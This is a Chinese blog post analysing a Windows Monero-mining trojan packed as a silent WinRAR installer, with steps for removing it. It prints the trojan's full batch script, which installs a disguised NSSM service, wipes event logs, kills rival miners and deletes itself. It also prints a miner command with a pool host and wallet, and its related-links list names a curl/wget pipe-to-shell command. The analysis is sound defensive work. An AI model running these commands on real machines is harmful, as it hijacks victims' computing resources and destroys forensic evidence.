MS016小组(原创)

上一篇文章 简单讲了一下挖矿木马 大概流程  文章地址:

https://www.cnblogs.com/ms016/articles/7978880.html

今天讲分析一个挖矿木马了解ta的原理 和查杀方式  讲的是Windows挖矿木马 也是 门罗币 对比其ta挖矿木马 也许替换挖矿程序 就可以了 所以基本其ta挖矿

基本都相同 先看挖矿木马吧

其实看图标就像一个解压包 就是winrar 下的 弄成静默安装 我们用winrar 打开看看

右边的信息 代表 静默包完成什么操作

Path 运行静默包 会把里面的程序释放到 path 信息上的路径

路径 C:\Windows\daozai

Setup 运行 path路径 里面的程序

运行路径下的 run.bat 处理文件C:\Windows\daozai\run.bat

后面基本都是设置成不需要提示直接运行静默包

然后解压文件分析这几个文件做什么的

Run.bat 是启动批处理

Run64.bat 运行钱包程序的 批处理

Svchost.exe 是NSSM一款守护进程的软件

Win1ogin.exe 是挖矿程序

了解这些文件的区别就逐个分析

先看看run.bat批处理

echo Havefun

C:\Windows\daozai\svchost.exe install "Windows32_Update" "C:\Windows\daozai\run64.bat"

C:\Windows\daozai\svchost.exe start Windows32_Update

wevtutil cl "windows powershell"

wevtutil cl "security"

wevtutil cl "system"

echo Havefun

@sc delete Systemss

@sc delete Service

@sc delete TeamServers

@sc delete WMIserver

@sc delete WMIservers

@sc delete WMI

@sc delete Serv

@sc delete system_update

@sc delete system_updatea

@sc config wuauserv start= delayed-auto

@echo off

for %%a in (

spoolsvs.exe

taskhost.exe

NsCpuapl.exe

MSASCui.exe

nheqminer_zcash.exe

nssm.exe

update.exe

server.exe

sppscv.exe

taskhost.exe

acnom.exe

acnon.exe

control.exe

install.exe

kill.exe

ntuhost.exe

Terms.EXE

winhost.exe

netcore.exe

Service.exe

cpuminer-aes-sse42.exe

Network.exe

TeamServers.exe

) do taskkill /f /im %%a

@echo off

cacls c:\windows\Fones\Service.exe  /e /d everyone

cacls c:\windows\d11cache\TeamServers.exe e /d everyone

cacls C\Windows\d11cache\Network.exe e /d everyone

cacls c:\windows\d11cache\cpuminer-aes-sse42.exe e /d everyone

cacls C:\Windows\netcore.exe e /d everyone

cacls C:\Windows\winhost.exe e /d everyone

cacls C:\Windows\Terms.EXE e /d everyone

cacls c:\windows\ntuhost.exe e /d everyone

cacls c:\windows\d11cache  /e /d everyone

cacls C\SysData /e /d everyone

ping -n 5 127.0.0.1

taskkill /im mscorsvw.exe /f

taskkill /im WUDFHost.exe /f

taskkill /im nheqminer.exe /f

taskkill /im NsCpuCNMiner64.exe /f

taskkill /im NsCpuCNMiner.exe /f

taskkill /f /im mssecsvc.exe /f

taskkill /f /im taskhost.exe  /f

taskkill /f /im  sppscv.exe /f

del %sfxcmd%

del %0

exit

  

前面是调用NSSM软件守护挖矿程序

然后启动钱包批处理

NSSM 开始守护

清除系统日志 关闭一些服务 在清理进程

里面有些进程可能 是别的挖矿大牛常用的 是为了 方便清理别人的进程

在看Run64.exe批处理

win1ogin.exe -a cryptonight -o stratum+tcp://mine.ppxxmr.com:5555 -u 42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo+update -p 123

矿池 mine.ppxxmr.com

钱包42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo

-p 123 参数 cpu 应该是跑3个核心

然后开始调用挖矿程序

讲完挖矿静默包的运行流程

如果种了挖矿程序怎么查杀

我点击运行Update.exe 静默包

点击运行这个静默包 本身会自身删除的 所以基本不会保留

运行完挖矿静默包 计算机的任务管理器不见了

Cmd命令 打开任务管理器打不开

友情提示: 有些挖矿 会欺骗用户  比如电脑运行缓慢 打开任务管理器

任务管理器上的cpu显示正常 关闭任务管理器 电脑又卡了

所以还是用第三方的一些管理工具查看比较好

cpu 百分之百了

挖矿程序占用最高 权限是system system是看不到的 不再administrator同一桌面

NSSM是守护进程 先把守护进程结束掉在结束掉挖矿程序

NSSM会自启动挖矿程序

NSSM会把挖矿程序写入自启动 服务里面 所以必须把这个服务停用或卸载掉

NSSM里面有卸载命令

nssm remove <servicename> confirm

  

卸载命令

就删除了服务

最后清理目录下的挖矿程序

黑客利用NSSM这个软件 也是方便免杀 因为这种软件 一般都不会被添加到病毒库里面

友情提示:

国外的安全厂商为了 封杀算力 大的挖矿僵尸网络 会联系矿池 管理员要求 停止支付黑客钱包 来打击黑客

@感谢刀仔提供技术支持

Windows下的挖矿木马查杀的更多相关文章

  1. Linux下 XordDos(BillGates)木马查杀记录

    最近朋友的一台服务器突然网络异常,cpu占用率暴表,登录上去一查,cpu占用300% 左右,流量异常,经过看查进程,获取信息最终确认为中了dos木马,经过几天的研究,基本上已经清除,以下是清理记录. ...

  2. 病毒木马查杀实战第011篇:QQ盗号木马之专杀工具的编写

    前言 由于我已经在<病毒木马查杀第004篇:熊猫烧香之专杀工具的编写>中编写了一个比较通用的专杀工具的框架,而这个框架对于本病毒来说,经过简单修改也是基本适用的,所以本文就不讨论那些重叠的 ...

  3. 病毒木马查杀实战第010篇:QQ盗号木马之十六进制代码分析

    前言 按照我的个人习惯,在运用诸如IDA Pro与OllyDBG对病毒进行逆向分析之前,我都会利用一些自动化的工具,通过静态或动态的分析方法(参见<病毒木马查杀第008篇:熊猫烧香之病毒查杀总结 ...

  4. 病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御

    前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术.之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本 ...

  5. 360软件的木马查杀、漏洞修复等组件不能使用,提示runtime error

    一.故障现象:1.360软件的木马查杀.漏洞修复等组件不能使用,提示runtime error2.暴风影音等很多软件不能正常使用3.设备管理器不能打开,提示“MMC 不能打开文件”4.部分https安 ...

  6. zigw 和 nanoWatch, libudev.so 和 XMR 挖矿程序查杀记录

    最近这两天以来,服务器一致声音很响.本来以为有同事在运行大的程序,结果后来发现持续很长时间都是这样,并没有停的样子.后来查了一下,发现有几个可疑进程导致,干掉之后,果然服务器静悄悄了. 但是,问题并没 ...

  7. 病毒木马查杀实战第009篇:QQ盗号木马之手动查杀

    前言 之前在<病毒木马查杀第002篇:熊猫烧香之手动查杀>中,我在不借助任何工具的情况下,基本实现了对于"熊猫烧香"病毒的查杀.但是毕竟"熊猫烧香" ...

  8. Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)

    概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...

  9. 病毒木马查杀实战第020篇:Ring3层主动防御之基本原理

    前言 假设说我们的计算机中安装有杀毒软件,那么当我们有意或无意地下载了一个恶意程序后.杀软一般都会弹出一个对话框提示我们,下载的程序非常可能是恶意程序,建议删除之类的.或者杀软就不提示.直接删除了:或 ...

  10. Linux之在CentOS上一次艰难的木马查杀过程

    今天朋友说他一台要准备上线的生产服务器被挂马,特征ps命令找不到进程,top能看到负载最高的一个程序是一个随机的10位字母的东西,kill掉之后自动再次出现一个随机10位字母的进程. 我让他关闭这个机 ...

随机推荐

  1. Nginx04 反向代理和负载均衡

    1 反向代理介绍 https://www.cnblogs.com/jthr/p/16827214.html 2 负载均衡介绍 https://www.cnblogs.com/jthr/p/168273 ...

  2. Vue17 手机表单数据

    1)v-model.trim trim修饰符是去掉前后空格 2)type="number" v-model.number type="number":只能输入数 ...

  3. python爬虫学习——列表

    namelist = [] #定义一个空的列表 namelist1 = ["小张","小红","小李"] print(namelist1[0 ...

  4. .NET Core 项目启动时运行定时任务

    1.任务需求 在每次服务启动时定时(如24小时)清理一次缓存文件 2.代码实现 1)新建文件清理类 .NET Core 提供了BackgroundService的抽象类,在 ExecuteAsync ...

  5. jenkins简单安装及配置(Windows环境

    jenkins简单安装及配置(Windows环境) jenkins是一款跨平台的持续集成和持续交付.基于Java开发的开源软件,提供任务构建.持续集成监控的功能,可以使开发测试人员更方便的构建软件项目 ...

  6. SX【2020.01.09】NOIP提高组模拟赛(day1)

    [2020.01.09]NOIP提高组模拟赛(day1) 这次考得不理想,只做了前两题,后两题没时间做,说明做题速度偏慢. source : 100 + 20 + 0 + 0 = 120 rank7 ...

  7. centos7 ssh服务

    转载博客园: Centos7开启SSH服务 - KinwingHU - 博客园 (cnblogs.com)

  8. div 元素内容超出可通过鼠标滚轮实现横向滚动

    移动端中的元素内容超出时,对容器设置overflow-x: auto就可以通过手势水平移动.但是 PC 端只能通过鼠标滚轮上下滑动,而不能水平移动. 只需要给元素添加一个监听鼠标滚轮事件,上下滑动时修 ...

  9. 【Java-01-3】java基础-基本语法(3)(数组,多维数组)

    import java.io.*; public class _07_Array { public static void main(String[] args) { // 1 定义数组 System ...

  10. 修复gitlab权限(docker方式搭建)

    docker exec -it gitlab update-permissions docker restart gitlab